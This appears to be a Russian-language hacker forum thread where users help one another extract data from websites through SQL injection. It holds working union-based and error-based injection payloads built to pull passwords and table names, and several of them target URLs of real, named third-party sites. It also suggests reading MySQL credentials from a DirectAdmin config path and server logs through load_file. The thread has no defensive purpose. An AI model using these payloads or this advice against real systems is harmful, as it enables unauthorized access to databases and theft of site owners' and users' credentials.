всё зависит от определённой ситуации. Попробуй +order+by+1+--+ или вместо +--+ /* И если без ошибок, то потом order by 10000000 и смотри что получается. А так по ошибки у тебя не соответсвие типов. Ожидается значение булевого типа.
Пробую вывести нужные мне значения из таблицы юзеров (есть поля user_id, user_name, email, password): script.php?id=-166+union+select+1,2,3,4,5,6,7,8,9,0,count(1),concat((SELECT+COUNT(1)+from+users),CHAR(58),floor(rand(0)*2))+x+from+users+group+by+x Этот запрос выводит 3:1, то есть таблица не пуста. Когда пробую вместо SELECT+COUNT(1)+from+users писать SELECT+password+from+users+LIMIT+1, запрос проходит, соответственно инфа не выводится. В чем может быть проблема?
не помогло, если мне не изменяет память, LIMIT 1 - это то же, что LIMIT 0,1, так что с этим проблем быть не должно, к тому же я пробовал GRUOP_CONCAT - тоже безуспешно
Сп за разъяснение! Ничего больше выдавить не получилось. Хорошо хоть есть вывод двух разных сообщений... буду крутить блинами
http://albionrecords.org/includes/version.xml Копай в этом направлении... И в этом http://albionrecords.org/includes/
а есть кто может проконсультировать по геморройным скулям, таким как вот такая к примеру: http://model-talent.net/portfolios/browse.php?age_end=43+and+1=1&age_start=10&page=4&page=24&gallery_view=0
Code: http://model-talent.net/portfolios/browse.php?age_end=43[B]+and+1=[/B]1&age_start=10&page=4&page=24&gallery_view=0 там скулище ))) выделил
http://www.hayesbklaw.com/index.php?id=1'+and+substring(version(),1,1)='5 или http://www.hayesbklaw.com/index.php?id=1'%20or%20(select%20count(*)%20from%20(select%201%20union%20select%202%20union%20select%203)x%20group%20by%20concat((select+table_name+from+information_schema.tables+limit+1),floor(rand(0)*2)))--+
Пробуйте через идентификатор сесии и не парьтесь(но не факт что она стартует!), а так провоцируйте ресурс к "неожиданным(недокументированым) ситуациям", любым, которые и выплюнут(возможно) ошибку. Если sqli сопровождаетцо инклудом(читалкой ...) можно запросить несуществующий файл и если ошибки не подавлены, то будет ошибка. При не верном запросе, также можно еще попытатцо логи прочитайть если есть привилегии у пользователя mysql(если речь о mysql иньекциях load_file!), например лог с ошибками(запросить перед етим несущетсвующий файл), ну понятно что надо искать лог. одним словом варианты есть (чем > практики тем больше фантазии! ). гугл в помочь еще. зы не надо привязыватцо для раскрытия к sqli только.
искать где-то тут надо наверно: /usr/local/directadmin/ тут пароль от мускуля /usr/local/directadmin/conf/mysql.conf
